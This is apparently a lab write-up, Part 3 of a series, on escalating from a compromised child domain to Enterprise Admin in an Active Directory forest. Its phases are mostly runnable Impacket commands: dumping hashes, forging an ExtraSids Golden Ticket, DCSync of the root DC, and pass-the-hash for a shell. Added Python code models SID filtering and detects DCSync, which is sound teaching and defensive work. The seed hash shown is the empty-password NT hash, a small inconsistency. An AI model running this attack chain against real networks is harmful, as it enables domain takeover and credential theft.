In Part 2, we gained SYSTEM on WINTERFELL and minted a long-lived Golden Ticket for the child domain. We have total control of north, but in an Active Directory forest a child domain is only a stepping stone: the domain is not a security boundary, the forest is, and the parent domain sits one trust hop away.

Our objective now is to leverage the trust relationship between the Child (north) and the Parent (sevenkingdoms) to escalate our privileges to Enterprise Admin. We will do this without ever knowing a single cleartext password.

Environment

  • Child DC: winterfell.north.sevenkingdoms.local (192.168.66.11)
  • Root DC: kingslanding.sevenkingdoms.local (192.168.66.10)
  • Goal: Dump the hashes of the Forest Root Domain Controller.

Phase 1: Harvesting the Seed Hash

We cannot forge a ticket out of thin air: we need a cryptographic "seed" to start the chain. Since we already have SYSTEM-level execution on the north DC, we can pull the Administrator's hash straight out of the NTDS database. Run remotely, secretsdump does this over DRSUAPI replication (a DCSync against our own DC) rather than by reading ntds.dit from disk.

# Extracting the North Administrator hash from Winterfell
# (as written, secretsdump prompts for the administrator's password; to stay
#  password-less, load the Golden Ticket from Part 2 into KRB5CCNAME, target
#  winterfell.north.sevenkingdoms.local by name and add -k -no-pass)
impacket-secretsdump north.sevenkingdoms.local/administrator@192.168.66.11

Result: Administrator:500:aad3b...:31d6cfe0d16ae931b73c59d7e0c089c0:::

We now have the NT Hash (31d6cfe0d16ae931b73c59d7e0c089c0). This is the key that unlocks the rest of the attack.


Phase 2: Bridging the Trust (Raise Child)

To move from the child into the parent, we need three specific pieces of information:

  1. The krbtgt key of north (NT hash or AES256 key). It encrypts the forged TGT and signs its PAC, which is what makes north's KDC accept the ticket as its own.
  2. The SID of the child domain (north), which the ticket is issued for.
  3. The SID of the parent domain (sevenkingdoms), to which we append RID 519 (Enterprise Admins) in the ticket's ExtraSids field.

We use raiseChild.py to collect these. Note that raiseChild.py is not only a reconnaissance tool: run to completion it performs the entire escalation itself (dumps the child krbtgt, forges the ticket with the Enterprise Admins SID and pulls the parent Administrator's hash over DRSUAPI). Here we take the values it prints and do the remaining steps by hand so that each one is visible. If you need the child domain SID separately, impacket-lookupsid against winterfell prints it as "Domain SID is: ...".

# Using the stolen hash to gather forest keys
python3 /usr/share/doc/python3-impacket/examples/raiseChild.py \
  -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 \
  north.sevenkingdoms.local/administrator

From its output we keep:

  • Child krbtgt AES256 key: c3fa9b0e01e744dfa3ad7d33e173bd16c889f0556ce40b292ced2c0b53221a7e
  • Child domain SID: S-1-5-21-3995002436-1582307507-150598601 (used as -domain-sid in Phase 4)
  • Parent domain SID: S-1-5-21-987402504-3918047113-3864484823
  • Enterprise Admins RID: 519

Phase 3: Making Kerberos Deterministic

If Kali does not know which IP serves which realm, ticket requests go nowhere and the attack fails, so we pin both realms in our Kerberos configuration. Two caveats: Impacket does not read krb5.conf at all, it finds the KDC by resolving the realm name (or takes -dc-ip), so the file below is what makes kinit, klist and GSSAPI-aware tools behave. And both domain names and both DC hostnames must also resolve, for example by pointing resolv.conf at a DC or adding them to /etc/hosts, because the request for kingslanding in Phase 5 is first sent to north's KDC and the referral it returns is then followed to sevenkingdoms.local by name.

Update your /etc/krb5.conf:

[libdefaults]
    default_realm = NORTH.SEVENKINGDOMS.LOCAL
    dns_lookup_kdc = false
    dns_lookup_realm = false
    rdns = false
    forwardable = true
    proxiable = true

[realms]
    NORTH.SEVENKINGDOMS.LOCAL = {
        kdc = 192.168.66.11
        admin_server = 192.168.66.11
    }
    SEVENKINGDOMS.LOCAL = {
        kdc = 192.168.66.10
        admin_server = 192.168.66.10
    }

[domain_realm]
    .north.sevenkingdoms.local = NORTH.SEVENKINGDOMS.LOCAL
    north.sevenkingdoms.local = NORTH.SEVENKINGDOMS.LOCAL
    .sevenkingdoms.local = SEVENKINGDOMS.LOCAL
    sevenkingdoms.local = SEVENKINGDOMS.LOCAL

Phase 4: Forging the Cross-Domain Golden Ticket (ExtraSids)

Now we forge a cross-domain Golden Ticket: a TGT for north's Administrator, encrypted and signed with the north krbtgt key we just recovered, whose PAC carries the parent's Enterprise Admins SID (S-1-5-21-987402504-3918047113-3864484823-519) in the ExtraSids (SID History) field. Parent/child trusts inside a forest do not apply SID filtering, so when kingslanding receives a request derived from this TGT it takes the ExtraSids at face value and treats us as an Enterprise Admin. (This is a Golden Ticket, not a Diamond Ticket: a Diamond Ticket modifies the PAC of a TGT the KDC legitimately issued, whereas here the whole TGT is built offline.)

# -aesKey is north's krbtgt key (Phase 2): it encrypts the TGT and signs the PAC
# -domain-sid is the CHILD domain SID (north); -extra-sid is the PARENT domain SID + 519
python3 /usr/share/doc/python3-impacket/examples/ticketer.py \
  -aesKey c3fa9b0e01e744dfa3ad7d33e173bd16c889f0556ce40b292ced2c0b53221a7e \
  -domain-sid S-1-5-21-3995002436-1582307507-150598601 \
  -extra-sid S-1-5-21-987402504-3918047113-3864484823-519 \
  -domain north.sevenkingdoms.local \
  -user-id 500 \
  Administrator

This creates Administrator.ccache. We load it into our session:

export KRB5CCNAME=$(pwd)/Administrator.ccache
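To see exactly which field carries the privilege, and what SID filtering would do to it, here is an added Python model (not part of the original post and not Impacket code) of how the resource DC evaluates the forged PAC. It uses the two domain SIDs from this article; the group RIDs are ticketer.py's defaults, and the filtering rule is a deliberate simplification of Windows SID filtering (it keeps only ExtraSids whose domain prefix is the issuing domain's and ignores the well-known-SID special cases).

```python
"""
Model of how a resource DC evaluates the ExtraSids (SID History) field of a
Golden Ticket's PAC, and what SID filtering would strip from it.
Simplified illustration, not Windows' exact algorithm.
"""
from dataclasses import dataclass

# Values from the article
CHILD_DOMAIN_SID = "S-1-5-21-3995002436-1582307507-150598601"     # north
PARENT_DOMAIN_SID = "S-1-5-21-987402504-3918047113-3864484823"    # sevenkingdoms
ENTERPRISE_ADMINS_RID = 519


def parse_sid(sid: str) -> tuple[int, int, tuple[int, ...]]:
    """Split 'S-1-5-21-a-b-c-rid' into (revision, identifier authority, sub-authorities)."""
    parts = sid.split("-")
    if len(parts) < 4 or parts[0] != "S":
        raise ValueError(f"not a SID: {sid!r}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = tuple(int(p) for p in parts[3:])
    if revision != 1:
        raise ValueError(f"unsupported SID revision: {sid!r}")
    return revision, authority, subs


def domain_of(sid: str) -> str:
    """Domain SID of a domain account SID: everything except the trailing RID."""
    revision, authority, subs = parse_sid(sid)
    if authority != 5 or subs[0] != 21 or len(subs) < 5:
        raise ValueError(f"not a domain account SID: {sid!r}")
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs[:-1]))


def rid_of(sid: str) -> int:
    return parse_sid(sid)[2][-1]


@dataclass
class ForgedPac:
    """The authorization data ticketer.py writes into the Golden Ticket."""
    logon_domain_sid: str          # -domain-sid
    user_rid: int                  # -user-id
    group_rids: tuple[int, ...]    # group RIDs, all relative to logon_domain_sid
    extra_sids: tuple[str, ...]    # -extra-sid, fully qualified SIDs


def sid_filter(pac: ForgedPac, quarantined: bool) -> list[str]:
    """
    ExtraSids the resource DC keeps.
    quarantined=False models the default parent/child trust inside one forest:
    nothing is filtered, which is why the attack works.
    quarantined=True models SID filtering (as on a forest trust): any SID whose
    domain part is not the issuing domain's is discarded.
    """
    if not quarantined:
        return list(pac.extra_sids)
    return [s for s in pac.extra_sids if domain_of(s) == pac.logon_domain_sid]


def effective_sids(pac: ForgedPac, quarantined: bool) -> set[str]:
    """Every SID the resource DC will believe the caller holds."""
    sids = {f"{pac.logon_domain_sid}-{pac.user_rid}"}
    sids |= {f"{pac.logon_domain_sid}-{rid}" for rid in pac.group_rids}
    sids |= set(sid_filter(pac, quarantined))
    return sids


def grants_enterprise_admin(pac: ForgedPac, quarantined: bool) -> bool:
    """True if the forest root's Enterprise Admins SID survives into the token."""
    return f"{PARENT_DOMAIN_SID}-{ENTERPRISE_ADMINS_RID}" in effective_sids(pac, quarantined)


# The ticket forged in Phase 4. Note that 519 among the child group RIDs is
# meaningless (Enterprise Admins only exists in the forest root); the privilege
# comes solely from the parent-domain SID carried in ExtraSids.
TICKET = ForgedPac(
    logon_domain_sid=CHILD_DOMAIN_SID,
    user_rid=500,
    group_rids=(513, 512, 520, 518, 519),   # ticketer.py default groups
    extra_sids=(f"{PARENT_DOMAIN_SID}-{ENTERPRISE_ADMINS_RID}",),
)

if __name__ == "__main__":
    print("intra-forest trust (no SID filtering):", grants_enterprise_admin(TICKET, quarantined=False))
    print("with SID filtering:                  ", grants_enterprise_admin(TICKET, quarantined=True))
```

The second line of output is why this attack is confined to a single forest: across a forest trust the same ticket would arrive with its ExtraSids stripped, and the caller would be nothing more than north's Administrator.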

Phase 5: The Grand Finale (DCSync)

When secretsdump asks for a service ticket to kingslanding, north's KDC cannot issue one for a foreign realm; it validates our forged TGT with its krbtgt key and hands back an inter-realm referral TGT, protected with the trust key and still carrying our PAC. Kingslanding decrypts that referral, copies the PAC (Enterprise Admins ExtraSid included) into the service ticket, and from then on treats us as an Enterprise Admin. That group holds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the root domain, so we can DCSync: ask the root DC over DRSUAPI to replicate its credential database to us.

# Using the ticket (-k) to dump the Forest Root
# (add -just-dc-user Administrator to pull only that one account)
impacket-secretsdump -k -no-pass north.sevenkingdoms.local/Administrator@kingslanding.sevenkingdoms.local

The Loot: Administrator:500:aad3b...:c5f2d015f316018f6405522825689ffe:::
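From the defender's side the request above leaves a trace: with Directory Service Access auditing enabled, kingslanding logs Event ID 4662 whose Properties field lists the control-access-right GUIDs that were exercised. The following Python rule, an added example that is not from the original post, flags successful 4662 events exercising the replication rights from any account that is not a known DC machine account. The events are constructed to resemble this lab, and the DC allowlist is an assumption for the lab; in practice it would be derived from the Domain Controllers OU.

```python
"""
Detection for the DCSync in Phase 5, run over constructed sample events (not
real logs from the lab). Only domain controllers should ever exercise the
directory replication rights; any other caller is a DCSync candidate.
"""
from dataclasses import dataclass

# Well-known extended-right GUIDs required to replicate directory data.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"   # needed for secrets
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES: "DS-Replication-Get-Changes",
    DS_REPLICATION_GET_CHANGES_ALL: "DS-Replication-Get-Changes-All",
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET: "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts allowed to replicate: the DCs' machine accounts. Assumed for this lab;
# derive it from the Domain Controllers OU rather than a static list in production.
KNOWN_DC_ACCOUNTS = {
    ("SEVENKINGDOMS", "KINGSLANDING$"),
    ("NORTH", "WINTERFELL$"),
}


@dataclass
class Event4662:
    """The EventData fields of a 4662 that the rule needs."""
    computer: str         # DC that logged the event
    keywords: str         # "Audit Success" / "Audit Failure"
    subject_domain: str   # SubjectDomainName
    subject_user: str     # SubjectUserName
    access_mask: int      # AccessMask; 0x100 = Control Access
    properties: str       # Properties, the multi-line list of {GUID}s


def replication_rights_used(properties: str) -> set[str]:
    """Names of the replication rights whose GUIDs appear in the Properties field."""
    text = properties.lower()
    return {name for guid, name in REPLICATION_RIGHTS.items() if guid in text}


def is_domain_controller(domain: str, user: str) -> bool:
    return (domain.upper(), user.upper()) in KNOWN_DC_ACCOUNTS


def detect_dcsync(events: list[Event4662]) -> list[str]:
    """One alert line per successful replication request from a non-DC account."""
    alerts = []
    for ev in events:
        if ev.keywords != "Audit Success" or not ev.access_mask & 0x100:
            continue
        rights = replication_rights_used(ev.properties)
        if not rights or is_domain_controller(ev.subject_domain, ev.subject_user):
            continue
        alerts.append(
            f"DCSync suspected on {ev.computer}: {ev.subject_domain}\\{ev.subject_user} "
            f"used {', '.join(sorted(rights))}"
        )
    return alerts


# Constructed sample events for this lab
SAMPLE_EVENTS = [
    # normal replication between DCs: allowlisted
    Event4662("kingslanding.sevenkingdoms.local", "Audit Success", "NORTH", "WINTERFELL$", 0x100,
              "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    # Phase 5: the forged north Administrator pulling secrets from the root DC
    Event4662("kingslanding.sevenkingdoms.local", "Audit Success", "NORTH", "Administrator", 0x100,
              "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    # unrelated 4662 on a user object (GUID is the 'user' schema class): benign
    Event4662("kingslanding.sevenkingdoms.local", "Audit Success", "SEVENKINGDOMS", "helpdesk", 0x10,
              "{bf967aba-0de6-11d0-a285-00aa003049e2}"),
    # a denied attempt is a failure audit; this rule is for what actually succeeded
    Event4662("kingslanding.sevenkingdoms.local", "Audit Failure", "NORTH", "Administrator", 0x100,
              "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
]

if __name__ == "__main__":
    for line in detect_dcsync(SAMPLE_EVENTS):
        print(line)
```

Because the forged ticket names a real account in the child, the root DC records the caller as NORTH\Administrator, not as anything in the sevenkingdoms domain; a replication request from a foreign-domain user account is the strongest single signal of this technique.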


Phase 6: Persistence & Verification

To finalize the takeover, we pivot from Kerberos back to NTLM. We use the recovered Root Administrator hash to spawn an interactive shell on the Forest Root DC.

# Gaining a shell via Pass-the-Hash
impacket-wmiexec -hashes :c5f2d015f316018f6405522825689ffe SEVENKINGDOMS/Administrator@192.168.66.10

# Verifying "Pwn3d!" status
nxc smb 192.168.66.10 -u Administrator -H c5f2d015f316018f6405522825689ffe

Conclusion

By chaining a compromised child-domain Administrator hash into a Golden Ticket that carries the forest root's Enterprise Admins SID, we went from owning north to owning the entire forest without a single cleartext password. Nothing here bypassed a security boundary, because inside a forest there is none to bypass: a domain is not a security boundary, the forest is. Defenders should treat the compromise of any child domain as a compromise of the forest, and keep tenants that genuinely need isolation in separate forests, where SID filtering on the trust strips exactly the ExtraSid this attack relies on.

Categories: Security
